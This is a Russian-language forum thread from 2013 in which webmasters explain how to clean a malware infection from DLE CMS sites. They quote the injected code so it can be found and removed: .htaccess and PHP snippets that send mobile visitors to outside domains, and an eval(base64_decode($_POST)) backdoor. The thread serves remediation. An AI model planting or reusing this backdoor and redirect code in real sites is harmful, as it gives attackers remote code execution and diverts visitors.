Вирус на сайте cms dle

Уже давно эта ситуевина известна. Несколько страниц назад обсуждалась. :)

---------- Добавлено 08.04.2013 в 20:43 ----------

Искать по левым урлам, смотреть дату изменения файлов на сервере...

Ломают через дыру в DLE это не зависит от хостинга.

В гиф'ке просто пхп код на внедрение вредоносного кода в ваши файлы(поиск и запись в файлы).

Подытожим для тех кто не хочет все искать и читать кучу страниц. 🍿

Зараженные файлы:

.htaccess

index.php

engine/engine.php

engine/init.php

engine/data/config.php

engine/data/dbconfig.php

language/Russian/language.lng

Ниже указаны коды, которые необходимо удалить в каждом из указанных файлов.

Код в .htaccess

RewriteCond %{QUERY_STRING} (^|&)noredirect=true(&|$)

RewriteRule ^ - [CO=mredir:0:%{HTTP_HOST},S]

RewriteCond %{HTTP:x-wap-profile} !^$ [OR]

RewriteCond %{HTTP:Profile} !^$

RewriteCond %{HTTP_HOST} !^m\.

RewriteCond %{HTTP:Cookie} !\smredir=0(;|$)

RewriteRule ^ http://$host/ [R,L]

Код в файлах engine/engine.php, engine/init.php, engine/data/config.php, engine/data/dbconfig.php

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

 

if ($iphone || $android || $palmpre || $ipod || $berry === true) {

header('Location: http://statuses.ws/');

}

Код может отличаться.

В engine/engine.php, engine/init.php просматриваем полностью каждый файл. Сам код повторяется и находится в разных местах.

В engine/data/config.php, engine/data/dbconfig.php код находится в самом начале файла и в конце.

Код в language/Russian/language.lng

В самом конце находится примерно такой код:

@setlocale(LC_ALL, array("ru_RU.CP1251", "ru_SU.CP1251", "ru_RU.KOI8-r", "ru_RU", "russian", "ru_SU", "ru"));

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://getinternet.ws/');

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

Как проверить, что все удалено?

В мозилле устанавливаем аддон:

https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/ - нужен для того, чтобы переключить юзерагент.

После установки аддона выносим кнопку на панель (зайти в Настройки панели инструментов).

Далее.

В отдельный файл помещаем все свои сайты (урлы). Дальше вставляем в форму на этом сайте:

http://www.urlopener.com/index.php - позволит открыть все сайты разом.

После открытия всех сайтов включаем юзерагент (выбираем Iphone). Теперь на каждом сайте жмем F5 или обновляем страниц по-другому. И смотрим что произойдет. Если что-то не было удалено или не до конца почищено, то произойдет редирект на левый сайт. Если все удалено, то мы увидим нормальную страницу с контентом.

goliafz поправлю вас:

файла language/Russian/language.lng нет, править language/Russian/website.lng

и в нем эту строчку

не трогать...

и опять же выбрать User Agent лучше не айфон, а андройд...

А как там добавить андроид? В списке User Agent его нет.

Хотел поинтересоваться, у всех в этом топике лицензии стоят или в основном нуленные версии? В последнее время на мой сайт начали лить всякую гадость, уже не успеваю отбиваться. Про снижение трафа у сайта (в 3 раза), я вообще молчу. Версия на сайте нуленная (9.3).

Есть ли смысл в покупки лицензии и повышает ли она безопасность сайта?

Читайте тему, ломают и те и другие. Никто ничего не слышал о том, как закрыть эту дыру? Или достаточно сделать гифки статичными?

Да, ошибся.

А почему эту строчку не трогать?

Я ее по нечайке со всех своих сайтов удалил 😂

Почему лучше андроид? Я на айфоне тестировал и у меня один сайт не был до конца почищен и все показалось.

---------- Добавлено 09.04.2013 в 20:51 ----------

Ничего не решает лицензия. ДЛЕ - вообще дырявая.

Разработчики организовали обновление крайне убого. Если стоят какие-то модули, рюшечки, то после обновления считай все это нужно заново устанавливать, добавлять в файлы. Поэтому многие не обновляются, а остаются на том, что есть.

Я даже заметил такую веселость, что после очистки кэша в админке - исчезают новые категории на сайте.

Жаль конечно, что лицензия не решает проблемы со всякой вирусней. Придется латать дыры или переходить на другой двиг.

goliafz строчка та от движка...

айфон не подвержен заражению, соответственно и вставок срабатывающих на андройд больше (например 'An'.'dr'.'oid').

проверять 3 агентами: андройд, айфон, виндовсфон чтобы наверняка...